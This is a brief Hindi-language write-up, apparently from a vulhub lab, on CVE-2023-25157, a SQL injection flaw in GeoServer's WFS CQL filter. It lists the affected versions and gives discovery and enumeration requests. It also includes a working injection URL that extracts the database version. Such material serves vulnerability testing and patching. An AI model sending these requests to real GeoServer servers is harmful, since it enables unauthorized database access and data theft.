
CVE-2023-25157 के लिए शोषण: GeoServer WFS सेवा में SQL इंजेक्शन क्राफ्टेड CQL फ़िल्टर सिंटैक्स के माध्यम से, अनधिकृत रिमोट डेटा निष्कर्षण और संभावित डेटाबेस सर्वर समझौता सक्षम करता है।
चूंकि उपयोगकर्ता इनपुट को फ़िल्टर नहीं किया जाता है, दूरस्थ अनधिकृत हमलावर विकृत फ़िल्टर सिंटैक्स बनाकर GeoServer की लेक्सिकल पार्सिंग को बायपास कर सकते हैं, जिससे SQL इंजेक्शन हो सकता है, सर्वर की संवेदनशील जानकारी प्राप्त की जा सकती है, और यहां तक कि डेटाबेस सर्वर अनुमतियां भी प्राप्त की जा सकती हैं।
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
खोजें
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

vulhub:example फ़ीचर नाम से संबंधित गुण प्राप्त करें
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



